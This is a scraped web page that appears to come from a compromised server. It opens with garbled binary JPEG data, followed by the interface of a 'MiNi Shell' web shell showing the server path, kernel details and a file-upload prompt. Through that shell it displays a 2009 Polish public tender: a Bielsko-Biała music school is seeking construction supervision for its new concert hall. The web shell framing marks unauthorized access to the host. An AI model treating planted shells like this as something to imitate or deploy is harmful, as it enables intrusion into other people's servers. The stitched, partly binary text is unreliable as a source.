JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090518/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090518/154072-N-2009.html

<p class="kh_header"><b>Bielsko-Biała: NADZÓR INWESTORSKI NAD BUDOWĄ SALI KONCERTOWEJ WRAZ Z WYPOSAŻENIEM NA POTRZEBY PAŃSTWOWEJ OGÓLNOKSZTAŁCĄCEJ SZKOŁY MUZYCZNEJ W BIELSKU-BIAŁEJ</b><br>
<b>Numer ogłoszenia: 154072 - 2009; data zamieszczenia: 18.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowa Ogólnokształcąca Szkoła Muzyczna I i II stopnia im. Stanisława Moniuszki , ul. Wyspiańskiego 5a, 43-300 Bielsko-Biała, woj. śląskie, tel. 033 4988410, faks 033 4988423.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.psm.bielsko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: szkoła publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> NADZÓR INWESTORSKI NAD BUDOWĄ SALI KONCERTOWEJ WRAZ Z WYPOSAŻENIEM NA POTRZEBY PAŃSTWOWEJ OGÓLNOKSZTAŁCĄCEJ SZKOŁY MUZYCZNEJ W BIELSKU-BIAŁEJ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem niniejszego zamówienia publicznego jest pełnienie w imieniu Zamawiającego obowiązków inspektora nadzoru inwestorskiego nad budową sali koncertowej Państwowej Ogólnokształcącej Szkoły Muzycznej I i II stopnia im. St. Moniuszki w Bielsku-Białej wraz z wyposażeniem. Usługa obejmuje pełnienie kompleksowego nadzoru we wszystkich branżach (budowlanej, instalacyjnej).
2. Kod CPV:
a) 71.24.70.00-1  - Nadzór nad robotami budowlanymi 
b) 71.31.80.00-0 - Inżynieryjne usługi doradcze i konsultacyjne
3. W ramach pełnienia funkcji inspektora nadzoru w skład podstawowych obowiązków wchodzą w szczególności:
a) na etapie prowadzenia robót budowlanych:
- prowadzenie nadzoru nad wykonaniem robót i ich finansowaniem zgodnie z harmonogramem robót;
- uczestniczenie w naradach technicznych, problemowych i innych organizowanych przez wszystkie strony procesu inwestycyjnego;
- wydawanie zgody na wykonanie robót dodatkowych po uprzednim uzgodnieniu tej kwestii z Zamawiającym;
- podejmowanie wszelkich działań umożliwiających prawidłową realizację robót;
- prowadzenie nadzoru technicznego nad realizacją robót zgodnie z Prawem Budowlanym;
- pełnienie funkcji koordynacyjnych na budowie;
- stałe konsultowanie i fachowe doradztwo na rzecz Inwestora;
- prowadzenie rozliczeń związanych z realizacją robót, opracowywanie dokumentów rozliczeniowych, sprawozdań i innych dokumentów wymaganych przy realizacji robót, współpraca z Inwestorem, jednostką projektową i wykonawczą w zakresie realizowanych robót budowlanych;
- podejmowanie wszelkich niezbędnych działań w celu ochrony interesów Inwestora;
- sprawowanie nadzoru nad prowadzonymi robotami budowlanymi zgodnie z art. 25, 26 i 27 Prawa Budowlanego oraz zasadami działania Inspektora nadzoru, to jest w szczególności:
- kontrola jakości wykonanych prac budowlanych, zgodności robót z projektem i pozwoleniem na budowę, obowiązującymi przepisami i normami, przepisami techniczno - budowlanymi oraz przepisami BHP, SANEPID i p.poż;
- sprawdzanie posiadania przez wykonawcę odpowiednich dokumentów (atestów, certyfikatów, świadectw jakości, wyników badań itp.) dotyczących materiałów i urządzeń stosowanych przez wykonawcę robót budowlanych;
- kontrola prawidłowości prowadzenia robót budowlanych;
- sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających;
- uczestniczenie w prowadzonych próbach i odbiorach technicznych instalacji, urządzeń technicznych i przewodów kominowych oraz przygotowanie i udział w czynnościach odbioru gotowych obiektów budowlanych przekazywanie ich do użytkowania;
- rozstrzyganie wątpliwości o charakterze technicznym powstałych w toku prowadzonych robót, a w razie potrzeby zaciągania opinii autora projektu lub rzeczoznawców;
- bieżące prowadzenie rozliczeń finansowych z wykonawcą, ewentualnymi podwykonawcami oraz sprawdzanie kalkulacji wycen i faktur;
- opracowanie końcowego rozliczenia robót budowlanych;
- bieżące informowanie Inwestora o postępie robót budowlanych i o ewentualnych trudnościach w ich realizacji;
- zorganizowanie i dokonywanie przy udziale Inwestora odbiorów częściowych i końcowego robót budowlanych oraz protokolarne przekazanie Inwestorowi zrealizowanego zakresu inwestycji;
- sporządzenie wniosków o zapłatę kar umownych przez wykonawcę za nieterminowe wykonanie przedmiotu umowy;
- wystawienie dowodów OT, PT w terminie 30 dni od daty końcowego odbioru oraz przedłożenie Inwestorowi oświadczenia o usunięciu przez wykonawcę ewentualnych wad stwierdzonych w protokole odbioru robót.
b) po zakończeniu robót budowlanych:
- wykonanie czynności wynikających z udzielonej przez wykonawcę 5 letniej gwarancji i rękojmi na roboty budowlane, łącznie z uczestnictwem w komisjach powołanych przez Inwestora do oceny jakości robót w okresie gwarancji i rękojmi;
- zawiadomienie wykonawcy robót budowlanych o stwierdzonych wadach w okresie 5 letniej gwarancji i rękojmi;
- sporządzenie wniosków o zapłatę kar umownych za zwłokę w usunięciu wad stwierdzonych w okresie 5 letniej gwarancji i rękojmi;
- sporządzenie protokołu pousterkowego;
- uzyskanie w imieniu Inwestora (w razie potrzeby) pozwolenia na użytkowanie.
4. Informacje pomocnicze:
a) Wartość umowy na realizację robót, których dotyczy nadzór inwestorski wynosi ca 17 000 000,00 zł netto.
b) Dane ogólne budowanego budynku sali koncertowej:
Sala koncertowa
- powierzchnia zabudowy	1 227,00 m2
- powierzchnia użytkowa (netto)	2 490,00 m2
- kubatura	17 080,00 m3
w tym łącznik 
- powierzchnia  zabudowy	422,56 m2
- powierzchnia użytkowa (netto)	397,02 m2
- kubatura	1 310,00 m3
Łączna powierzchnia terenu objętego niniejszym zamówieniem ok. 0,15 ha.
c) Prace budowlane będą prowadzone w oparciu o posiadaną przez Zamawiającego dokumentację techniczną (projekty budowlane, projekty budowlane wykonawcze) oraz decyzję pozwolenia na budowę nr: Decyzja nr 1065/2008 z dnia 18.08.2008 wydana przez Prezydenta Miasta Bielska-Białej.
d) Szczegółowy zakres prac oraz wykaz ilościowy określają:
- Specyfikacje techniczne wykonania i odbioru robót budowlanych,
- Kosztorys ofertowy wykonawcy prac,
- Przedmiary..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1, 71.31.80.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 50.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Brak obowiązku wnoszenia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> A. nie podlegać wykluczeniu na podstawie art. 22 ustawy Prawo Zamówień Publicznych, a w szczególności:
a) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
b) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
d) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 w/w ustawy.
ocena spełniania warunku nastąpi w oparciu o oświadczenie, które Wykonawca złoży w ofercie oraz przedstawionych przez Wykonawcę dokumentów

B. wykonać zamówienie w terminie: w ciągu max 50 miesięcy od momentu rozpoczęcia realizacji zadania inwestycyjnego, z zastrzeżeniem iż:
- realizacja założeń określonych w pkt. 3a) oraz 3b) piąte wypunktowanie - w okresie max 14 miesięcy od daty rozpoczęcia realizacji zadania inwestycyjnego i wykonawca zobowiązuje się do co najmniej jednej wizyty na placu budowy w każdym tygodniu roku kalendarzowego w tym okresie,
- realizacja założeń określonych w pkt. 3b) z zastrzeżeniem powyższego wypunktowania - w okresie 36 miesięcy od daty sporządzenia protokołu odbioru końcowego i przekazania obiektu do eksploatacji. 
Uwaga: w przypadku skrócenia terminu realizacji zadania inwestycyjnego przez Wykonawcę robót poniżej 14 miesięcy, termin pełnienia obowiązków nadzoru inwestorskiego w czasie prowadzenia prac ulegnie proporcjonalnym zmianom.
ocena spełniania warunku nastąpi w oparciu o oświadczenie, które Wykonawca złoży w formularzu ofertowym

C. zaakceptować termin, sposób i etapowanie płatności - płatne w terminie 14 dni od daty otrzymania każdorazowo oryginału faktury w ciągu max 50 miesięcy od momentu podpisania umowy, z zastrzeżeniem iż:
- 95% wynagrodzenia umownego - będzie płatne w okresie max 14 miesięcy 
od daty rozpoczęcia realizacji zadania inwestycyjnego w miesięcznych równych ratach w wysokości wynikającej z formularza cenowego, każda faktura będzie wystawiana w terminie do 7 dnia każdego miesiąca za poprzedni miesiąc.
- 5% wynagrodzenia umownego - będzie płatne w okresie 36 miesięcy 
od daty sporządzenia protokołu odbioru końcowego i przekazania obiektu do eksploatacji w rocznych równych ratach w wysokości wynikającej z formularza cenowego, każda faktura będzie wystawiana w terminie do 7 stycznia każdego roku za poprzedni rok.
Uwaga: w przypadku skrócenia terminu realizacji zadania inwestycyjnego przez Wykonawcę robót poniżej 14 miesięcy, wynagrodzenie za pełnienie obowiązków nadzoru inwestorskiego ulegnie proporcjonalnym zmianom
ocena spełniania warunku nastąpi w oparciu o oświadczenie, które Wykonawca złoży w formularzu ofertowym

D. wykazać się doświadczeniem polegającym na wykonaniu minimum 2 zamówień o podobnym co przedmiot zamówienia charakterze (tj. nadzorowania budowy lub modernizacji obiektów użyteczności publicznej lub mieszkalnych o wartości nie mniejszej niż 15.000.000,00 złotych brutto każda, zakres robót winien obejmować prace ogólnobudowlane i instalacyjne) w okresie ostatnich trzech lat (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), podana wartość dotyczy wartości nadzorowanych robót budowlanych, a nie wynagrodzenia z tytułu pełnienia nadzoru inwestorskiego,
ocena spełniania warunku nastąpi w oparciu o dokumenty, które Wykonawca złoży w ofercie; brak którejkolwiek danej przy określonej pozycji lub dokumentu potwierdzającego jej należyte wykonanie skutkować będzie brakiem jej uwzględnienia przez Zamawiającego

E. posiadać wymagane przepisami prawa uprawnienia do pełnienia nadzoru nad robotami budowlanymi w kierunku zgodnym z przedmiotem zamówienia (konstrukcje budowlane i instalacje sanitarne (wod-kan, co) oraz elektryczne) z zastrzeżeniem iż osoby legitymujące się w/w uprawnieniami posiadają minimum 5 letnie doświadczenie zawodowe,
ocena spełniania warunku nastąpi w oparciu o dokumenty, które Wykonawca złoży w ofercie

Ocena spełnienia warunków będzie polegać na sprawdzeniu kompletności poprawności złożonych dokumentów i oświadczeń  według zasady  spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Odpowiednio do formy organizacyjnej:
- zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej;
lub
- odpis z właściwego rejestru.
wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
W przypadku  przedsiębiorców  występujących wspólnie - m.in. spółki cywilne, konsorcja - zaświadczenie o wpisie do ewidencji działalności gospodarczej lub odpis z właściwego rejestru każdego ze wspólników. 

2. Oświadczenie o niepodleganiu wykluczeniu na podstawie art. 22 ustawy Prawo Zamówień Publicznych z 29.01.2004 roku z późniejszymi zmianami (wzór w SIWZ). 
W przypadku wykonawców składających ofertę wspólnie (np. spółka cywilna, konsorcjum, itd.) każdy ze współwykonawców składa oświadczenie oddzielnie.   

3. Formularz oferty (wzór w SIWZ).

4. Formularz cenowy (wzór w SIWZ).

5. Pozostałe dokumenty, jakie winien złożyć Wykonawca, w celu potwierdzenia spełniania warunków udziału w postępowaniu:
a). wykaz (wzór w załączeniu) zawierający wykonanie minimum 2 zamówień o podobnym co przedmiot zamówienia charakterze (tj. nadzorowania budowy lub modernizacji obiektów użyteczności publicznej lub mieszkalnych o wartości nie mniejszej niż 15.000.000,00 złotych brutto każda, zakres robót winien obejmować prace ogólnobudowlane i instalacyjne) w okresie ostatnich trzech lat (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), podana wartość dotyczy wartości nadzorowanych robót budowlanych, a nie wynagrodzenia z tytułu pełnienia nadzoru inwestorskiego, do wykazu należy dołączyć dokumenty potwierdzające należyte wykonanie prac, dokumenty muszą zawierać dokładne dane Zleceniodawcy, jego adres, zakres zrealizowanych prac, termin wykonania prac, wartość wykonanych prac. 
brak którejkolwiek danej przy określonej pozycji lub dokumentu potwierdzającego jej należyte wykonanie skutkować będzie brakiem jej uwzględnienia przez Zamawiającego

b). zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji organu.
wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert

c). informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 9 ustawy.
wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert

d). informacja z Krajowego Rejestru Karnego lub równoważnego zaświadczenia właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt. 4 - 8 ustawy.
wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert

e). dokument uprawniający do pełnienia nadzoru nad robotami budowlanymi w kierunku zgodnym z przedmiotem zamówienia (konstrukcje budowlane i instalacje sanitarne (wod-kan, co) oraz elektryczne) z zastrzeżeniem, iż osoby legitymujące się w/w uprawnieniami posiadają minimum 5 letnie doświadczenie zawodowe, dodatkowo należy dołączyć aktualne zaświadczenia o przynależności do izby inżynierów budownictwa dla w/w osób.

f). wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia (wzór w SIWZ)

g). oświadczenie Wykonawcy o sposobie realizacji zamówienia w tym o powierzeniu do wykonania części zamówienia podwykonawcy, z podaniem zakresu powierzonych prac (wzór w SIWZ). 

Wszystkie ww. dokumenty składać należy w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.psm.bielsko.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Bielsko - Biała, ul. Wyspiańskiego 5a.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.06.2009 godzina 14:00, miejsce: Bielsko - Biała, ul. Wyspiańskiego 5a.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com